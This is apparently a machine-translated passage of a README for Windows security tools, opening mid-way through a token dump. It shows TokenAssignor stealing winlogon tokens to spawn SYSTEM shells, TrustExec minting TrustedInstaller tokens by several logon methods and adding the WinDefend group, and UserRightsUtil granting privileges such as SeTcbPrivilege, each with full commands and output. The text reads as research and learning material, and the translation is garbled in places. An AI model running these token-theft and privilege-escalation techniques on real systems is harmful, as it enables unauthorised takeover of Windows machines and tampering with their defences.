[+] SeDebugPrivilege is enabled successfully.
[>] Trying to dump thread token information.
[Token Information for svchost.exe (PID: 3516, TID: 4656)]
Token User : NT AUTHORITYSYSTEM (SID: S-1-5-18)
Token Owner : NT AUTHORITYSYSTEM (SID: S-1-5-18)
Primary Group : NT AUTHORITYSYSTEM (SID: S-1-5-18)
Token Type : Impersonation
Impersonation Level : Impersonation
Token ID : 0x0000000000038CC4
Authentication ID : 0x00000000000003E7
Original ID : 0x00000000000003E7
Modified ID : 0x000000000002CE61
Integrity Level : System
Protection Level : N/A
Session ID : 0
Elevation Type : Default
Mandatory Policy : NoWriteUp, NewProcessMin
Elevated : True
AppContainer : False
TokenFlags : IsFiltered, NotLow, EnforceRedirectionTrust
Has Linked Token : False
Token Source : N/A
Token Source ID : N/A
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeAssignPrimaryTokenPrivilege Disabled
SeTcbPrivilege EnabledByDefault, Enabled
SeSecurityPrivilege Disabled
SeSystemProfilePrivilege EnabledByDefault, Enabled
SeDebugPrivilege EnabledByDefault, Enabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
GROUP INFORMATION
-----------------
Group Name Attributes
====================================== ====================================================
Mandatory LabelSystem Mandatory Level Integrity, IntegrityEnabled
Everyone Mandatory, EnabledByDefault, Enabled
BUILTINUsers Mandatory, EnabledByDefault, Enabled
NT AUTHORITYSERVICE Mandatory, EnabledByDefault, Enabled
CONSOLE LOGON Mandatory, EnabledByDefault, Enabled
NT AUTHORITYAuthenticated Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITYThis Organization Mandatory, EnabledByDefault, Enabled
NT SERVICEDiagTrack EnabledByDefault, Enabled, Owner
NT AUTHORITYLogonSessionId_0_180260 Mandatory, EnabledByDefault, Enabled, Owner, LogonId
LOCAL Mandatory, EnabledByDefault, Enabled
BUILTINAdministrators EnabledByDefault, Enabled, Owner
DACL INFORMATION
----------------
Account Name Access Flags Type
==================== =========== ===== =============
NT AUTHORITYSYSTEM GenericAll None AccessAllowed
OWNER RIGHTS ReadControl None AccessAllowed
NT SERVICEDiagTrack GenericAll None AccessAllowed
SECURITY ATTRIBUTES INFORMATION
-------------------------------
[*] TSA://ProcUnique
Flags : NonInheritable, Unique
Type : UInt64
Value[0x00] : 0x0000000000000047
Value[0x01] : 0x000000000002C0FA
[*] Done.
De volta ao topo
Projeto
Esta ferramenta é aprender como atribuir token primário:
PS C:Dev> .TokenAssignor.exe
TokenAssignor - Tool to execute token assigned process.
Usage: TokenAssignor.exe [Options]
-h, --help : Displays this help message.
-c, --command : Specifies a command to execute. Default is cmd.exe.
-m, --method : Specifies a method ID (0 - 3).
-p, --pid : Specifies a source PID for token stealing.
[!] -m option is required.
Essa ferramenta tenta roubar token de um processo especificado e executar um processo atribuído com um token. A maioria dos métodos requer privilégios administrativos. Para executar um processo atribuído ao token com a API CreateProcessAsUser , set -m opção para 0 :
PS C:Dev> Get-Process winlogon
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
270 13 2452 10108 0.33 688 1 winlogon
PS C:Dev> whoami /user
USER INFORMATION
----------------
User Name SID
==================== =============================================
desktop-5ohmobjuser S-1-5-21-1955100404-698441589-1496171011-1001
PS C:Dev> .TokenAssignor.exe -p 688 -m 0
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Got a primary token from PID 688 (Handle = 0x68).
[+] Got a impersonation token from winlogon.exe (Handle = 0x2E0).
[+] Impersonation as winlogon.exe is successful.
[+] "C:Windowssystem32cmd.exe" is executed successfully (PID = 9552).
[*] User of the created process is NT AUTHORITYSYSTEM (SID: S-1-5-18).
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.
C:Dev>whoami /user
USER INFORMATION
----------------
User Name SID
=================== ========
nt authoritysystem S-1-5-18
Quando definido -m opção para 1 , essa ferramenta tenta criar um processo suspenso e atualizar o token primário para um token roubado. Este método não pode ser usado para alterar o ID da sessão devido à restrição do kernel. O ID da sessão do Kernel force Token a ser combinado com o ID da sessão para _EPROCESS :
PS C:Dev> whoami /user
USER INFORMATION
----------------
User Name SID
==================== =============================================
desktop-5ohmobjuser S-1-5-21-1955100404-698441589-1496171011-1001
PS C:Dev> .TokenAssignor.exe -p 688 -m 1
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Got a primary token from PID 688 (Handle = 0x2C8).
[+] Got a impersonation token from winlogon.exe (Handle = 0x2D8).
[+] Impersonation as winlogon.exe is successful.
[+] Suspended "C:Windowssystem32cmd.exe" is executed successfully (PID = 9968).
[*] Current user of the suspended process is DESKTOP-5OHMOBJuser (SID: S-1-5-21-1955100404-698441589-1496171011-1001)
[+] Primary token for the suspended process is updated successfully.
[*] Current user of the suspended process is NT AUTHORITYSYSTEM (SID: S-1-5-18)
[*] Resuming the suspended process.
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.
C:Dev>whoami /user
USER INFORMATION
----------------
User Name SID
=================== ========
nt authoritysystem S-1-5-18
Se a opção Set -m estiver definida como 2 , cria um novo processo atribuído com token com o serviço de logon secundário:
PS C:Dev> whoami /user
USER INFORMATION
----------------
User Name SID
==================== =============================================
desktop-5ohmobjuser S-1-5-21-1955100404-698441589-1496171011-1001
PS C:Dev> .TokenAssignor.exe -p 688 -m 2
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Got a primary token from PID 688 (Handle = 0x2C4).
[+] "C:Windowssystem32cmd.exe" is executed successfully (PID = 5832).
[*] User of the created process is NT AUTHORITYSYSTEM (SID: S-1-5-18).
PS C:Dev>
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.
C:Dev>whoami /user
USER INFORMATION
----------------
User Name SID
=================== ========
nt authoritysystem S-1-5-18
Se a opção Set -m estiver definida como 3 , cria um novo processo atribuído pelo token com o método de falsificação PPID:
PS C:Dev> whoami /user
USER INFORMATION
----------------
User Name SID
==================== =============================================
desktop-5ohmobjuser S-1-5-21-1955100404-698441589-1496171011-1001
PS C:Dev> .TokenAssignor.exe -p 688 -m 3
[+] SeDebugPrivilege is enabled successfully.
[+] Got a handle from PID 688 (Handle = 0x2C4).
[+] Thread attribute is built successfully.
[+] "C:Windowssystem32cmd.exe" is executed successfully (PID = 4852).
[*] User of the created process is NT AUTHORITYSYSTEM (SID: S-1-5-18).
PS C:Dev>
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.
C:Dev>whoami /user
USER INFORMATION
----------------
User Name SID
=================== ========
nt authoritysystem S-1-5-18
De volta ao topo
Projeto
Esta ferramenta é para executar o processo como NT SERVICETrustedInstaller Group Conta. O POC original é TrustEdInstalcmd2.c da Grzegorz Tworek. Eu o porguei para C# e o reconstruí como uma ferramenta. A maioria das operações exige privilégio administrativo ( SeDebugPrivilege , SeImpersonatePrivilege e alto nível obrigatório):
PS C:Dev> .TrustExec.exe
TrustExec - Tool to create TrustedInstaller process.
Usage: TrustExec.exe [Options]
-h, --help : Displays this help message.
-l, --lookup : Flag to lookup account name or SID.
-n, --new-console : Flag to create new console. Use with -x flag.
-x, --exec : Flag to execute command.
-a, --account : Specifies account name to lookup.
-c, --command : Specifies command to execute. Default is cmd.exe.
-e, --extra : Specifies command to execute. Default is cmd.exe.
-m, --method : Specifies method ID. Default is 0 (NtCreateToken method).
-s, --sid : Specifies SID to lookup.
Available Method IDs:
+ 0 - Leverages NtCreateToken syscall.
+ 1 - Leverages virtual logon.
+ 2 - Leverages service logon.
+ 3 - Leverages S4U logon.
+ 4 - Leverages TrustedInstaller service.
Para este módulo, 2 técnicas estão implementadas. Podemos especificar um método com a opção -m . O valor da opção -m pode ser um número inteiro de 0 a 4 . Por exemplo, se você definir a opção -m como 0 , essa ferramenta tente obter o Token TrustedInstaller com NtCreateToken :
PS C:Dev> .TrustExec.exe -m 0 -x -c powershell
[*] NtCreateToken syscall method is selected.
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Impersonation as smss.exe is successful.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully for current thread.
[+] SeCreateTokenPrivilege is enabled successfully for current thread.
[+] SeImpersonatePrivilege is enabled successfully for current thread.
[+] Got a TrustedInstaller token (Handle = 0xE8).
[+] Got a token assigned process (PID: 2832).
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:Dev> whoami /user
USER INFORMATION
----------------
User Name SID
=================== ========
nt authoritysystem S-1-5-18
PS C:Dev> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeCreateTokenPrivilege Create a token object Enabled
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeSyncAgentPrivilege Synchronize directory service data Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller Enabled
SeRelabelPrivilege Modify an object label Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
PS C:Dev> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============================================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYSERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYAuthenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
BUILTINAdministrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
BUILTINUsers Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT SERVICETrustedInstaller Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner
Mandatory LabelSystem Mandatory Level Label S-1-16-16384
Se você deseja criar um processo com o novo console, defina -n sinalizador da seguinte forma:
PS C:Dev> .TrustExec.exe -m 1 -x -c powershell -n
[*] Virtual logon method is selected.
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Impersonation as smss.exe is successful.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully for current thread.
[+] SeImpersonatePrivilege is enabled successfully for current thread.
[+] SeTcbPrivilege is enabled successfully for current thread.
[+] A virtual domain VirtualDomain is created successfully (SID: S-1-5-110).
[+] A virtual account VirtualDomainVirtualAdmin is created successfully (SID: S-1-5-110-500).
[+] Got a virtual logon token (Handle = 0xEC).
[+] Got a token assigned process (PID: 23836).
[+] VirtualDomain domain is removed successfully.
Cada métodos que não sejam o método de serviço do TrustEdInstaller (a opção ID para -m é 4 ) Aceite SIDS de grupo extra com opção -e . O formato de valor para -e opção deve ser SDDL SID String. Para o Sid String Separator, você pode usar vírgula da seguinte maneira:
PS C:Dev> .TrustExec.exe -m 0 -x -c powershell -e S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736,S-1-5-32-551
[*] NtCreateToken syscall method is selected.
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Impersonation as smss.exe is successful.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully for current thread.
[+] SeCreateTokenPrivilege is enabled successfully for current thread.
[+] SeImpersonatePrivilege is enabled successfully for current thread.
[+] Got a TrustedInstaller token (Handle = 0x30C).
[+] Got a token assigned process (PID: 17500).
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:Dev> whoami /user
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ =============================================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYSERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYAuthenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
BUILTINBackup Operators Alias S-1-5-32-551 Enabled by default, Enabled group
BUILTINAdministrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
BUILTINUsers Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT SERVICETrustedInstaller Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner
Mandatory LabelSystem Mandatory Level Label S-1-16-16384
NT SERVICEWinDefend Well-known group S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736 Enabled by default, Enabled group
Para resolver a conta SID, defina -l sinalizador e -a opção com o nome da conta da seguinte maneira:
PS C:Dev> .TrustExec.exe -l -a "nt servicewindefend"
[*] Account Name : NT SERVICEWinDefend
[*] Account SID : S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736
[*] Account Type : WellKnownGroup
PS C:Dev> .TrustExec.exe -l -a users
[*] Account Name : BUILTINUsers
[*] Account SID : S-1-5-32-545
[*] Account Type : Alias
De volta ao topo
Projeto
Esta ferramenta é gerenciar o usuário certo sem secpol.msc . Comandos diferentes da lookup exigem privilégios de administrador:
C:dev>UserRightsUtil.exe
UserRightsUtil - User rights management utility.
Usage: UserRightsUtil.exe [Options]
-h, --help : Displays this help message.
-m, --module : Specifies module name.
Available Modules:
+ enum - Enumerate user rights for specific account.
+ find - Find accounts have a specific user right.
+ lookup - Lookup account's SID.
+ manage - Grant or revoke user rights.
[*] To see help for each modules, specify "-m <Module> -h" as arguments.
[!] -m option is required.
Para enumerar os direitos do usuário para uma conta específica, use o comando enum com -u e d opção opitões ou -s da seguinte forma:
C:dev>UserRightsUtil.exe -m enum -d contoso -u jeff
[>] Trying to enumerate user rights.
|-> Username : CONTOSOjeff
|-> SID : S-1-5-21-3654360273-254804765-2004310818-1105
[+] Got 7 user right(s).
|-> SeChangeNotifyPrivilege
|-> SeIncreaseWorkingSetPrivilege
|-> SeShutdownPrivilege
|-> SeUndockPrivilege
|-> SeTimeZonePrivilege
|-> SeInteractiveLogonRight
|-> SeNetworkLogonRight
[*] Done.
C:dev>UserRightsUtil.exe -m enum -s S-1-5-21-3654360273-254804765-2004310818-1105
[>] Trying to enumerate user rights.
|-> Username : CONTOSOjeff
|-> SID : S-1-5-21-3654360273-254804765-2004310818-1105
[+] Got 7 user right(s).
|-> SeChangeNotifyPrivilege
|-> SeIncreaseWorkingSetPrivilege
|-> SeShutdownPrivilege
|-> SeUndockPrivilege
|-> SeTimeZonePrivilege
|-> SeInteractiveLogonRight
|-> SeNetworkLogonRight
[*] Done.
Se você não especificar o nome de domínio com -d , use o nome do computador local como nome de domínio:
C:dev>hostname
CL01
C:dev>UserRightsUtil.exe -m enum -u guest
[>] Trying to enumerate user rights.
|-> Username : CL01Guest
|-> SID : S-1-5-21-2659926013-4203293582-4033841475-501
[+] Got 3 user right(s).
|-> SeInteractiveLogonRight
|-> SeDenyInteractiveLogonRight
|-> SeDenyNetworkLogonRight
[*] Done.
Este comando é encontrar usuários que tenham um direito específico. Por exemplo, se você deseja descobrir que os usuários têm SeDebugPrivilege , execute o seguinte:
C:dev>UserRightsUtil.exe -m find -r debug
[>] Trying to find users with SeDebugPrivilege.
[+] Found 1 user(s).
|-> BUILTINAdministrators (SID : S-1-5-32-544, Type : SidTypeAlias)
[*] Done.
Para listar o valor disponível para -r , use -l opção:
C:dev>UserRightsUtil.exe -m find -l
Available values for --right option:
+ TrustedCredManAccess : Specfies SeTrustedCredManAccessPrivilege.
+ NetworkLogon : Specfies SeNetworkLogonRight.
+ Tcb : Specfies SeTcbPrivilege.
+ MachineAccount : Specfies SeMachineAccountPrivilege.
+ IncreaseQuota : Specfies SeIncreaseQuotaPrivilege.
+ InteractiveLogon : Specfies SeInteractiveLogonRight.
+ RemoteInteractiveLogon : Specfies SeRemoteInteractiveLogonRight.
+ Backup : Specfies SeBackupPrivilege.
--snip--
Este comando é para procurar conta de pesquisa SID da seguinte maneira:
C:dev>UserRightsUtil.exe -m lookup -d contoso -u david
[*] Result:
|-> Account Name : CONTOSOdavid
|-> SID : S-1-5-21-3654360273-254804765-2004310818-1104
|-> Account Type : SidTypeUser
C:dev>UserRightsUtil.exe -m lookup -s S-1-5-21-3654360273-254804765-2004310818-500
[*] Result:
|-> Account Name : CONTOSOAdministrator
|-> SID : S-1-5-21-3654360273-254804765-2004310818-500
|-> Account Type : SidTypeUser
C:dev>UserRightsUtil.exe -m lookup -d contoso -u "domain admins"
[*] Result:
|-> Account Name : CONTOSODomain Admins
|-> SID : S-1-5-21-3654360273-254804765-2004310818-512
|-> Account Type : SidTypeGroup
Se você não especificar o nome de domínio com -d , use o nome do computador local como nome de domínio:
C:dev>hostname
CL01
C:dev>UserRightsUtil.exe -m lookup -u admin
[*] Result:
|-> Account Name : CL01admin
|-> SID : S-1-5-21-2659926013-4203293582-4033841475-500
|-> Account Type : SidTypeUser
Este comando é conceder ou revogar os direitos do usuário para uma conta de usuário específica. Para conceder à direita do usuário, especifique um usuário certo como o valor para -g opção:
C:dev>UserRightsUtil.exe -m find -r tcb
[>] Trying to find users with SeTcbPrivilege.
[-] No users.
[*] Done.
C:dev>UserRightsUtil.exe -m manage -g tcb -d contoso -u administrator
[>] Target account information:
|-> Username : CONTOSOAdministrator
|-> SID : S-1-5-21-3654360273-254804765-2004310818-500
[>] Trying to grant SeTcbPrivilege.
[+] SeTcbPrivilege is granted successfully.
C:dev>UserRightsUtil.exe -m find -r tcb
[>] Trying to find users with SeTcbPrivilege.
[+] Found 1 user(s).
|-> CONTOSOAdministrator (SID : S-1-5-21-3654360273-254804765-2004310818-500, Type : SidTypeUser)
[*] Done.
Para revogar o certo certo, especifique um usuário correto como o valor para -r opção:
C:dev>UserRightsUtil.exe -m find -r tcb
[>] Trying to find users with SeTcbPrivilege.
[+] Found 1 user(s).
|-> CONTOSOAdministrator (SID : S-1-5-21-3654360273-254804765-2004310818-500, Type : SidTypeUser)
[*] Done.
C:dev>UserRightsUtil.exe -m manage -r tcb -d contoso -u administrator
[>] Target account information:
|-> Username : CONTOSOAdministrator
|-> SID : S-1-5-21-3654360273-254804765-2004310818-500
[>] Trying to revoke SeTcbPrivilege
[+] SeTcbPrivilege is revoked successfully.
C:de>UserRightsUtil.exe -m find -r tcb
[>] Trying to find users with SeTcbPrivilege.
[-] No users.
[*] Done.
Para listar o valor disponível para opção -g ou -r , use -l opção:
C:dev>UserRightsUtil.exe -m manage -l
Available values for --grant and --revoke options:
+ TrustedCredManAccess : Specfies SeTrustedCredManAccessPrivilege.
+ NetworkLogon : Specfies SeNetworkLogonRight.
+ Tcb : Specfies SeTcbPrivilege.
+ MachineAccount : Specfies SeMachineAccountPrivilege.
+ IncreaseQuota : Specfies SeIncreaseQuotaPrivilege.
+ InteractiveLogon : Specfies SeInteractiveLogonRight.
+ RemoteInteractiveLogon : Specfies SeRemoteInteractiveLogonRight.
+ Backup : Specfies SeBackupPrivilege.
--snip--
De volta ao topo
De volta ao topo
Obrigado por seus conselhos sobre a programação de extensão Windbg:
Obrigado pela sua pesquisa notável:
Obrigado pela sua amostra de liberação do driver do kernel:
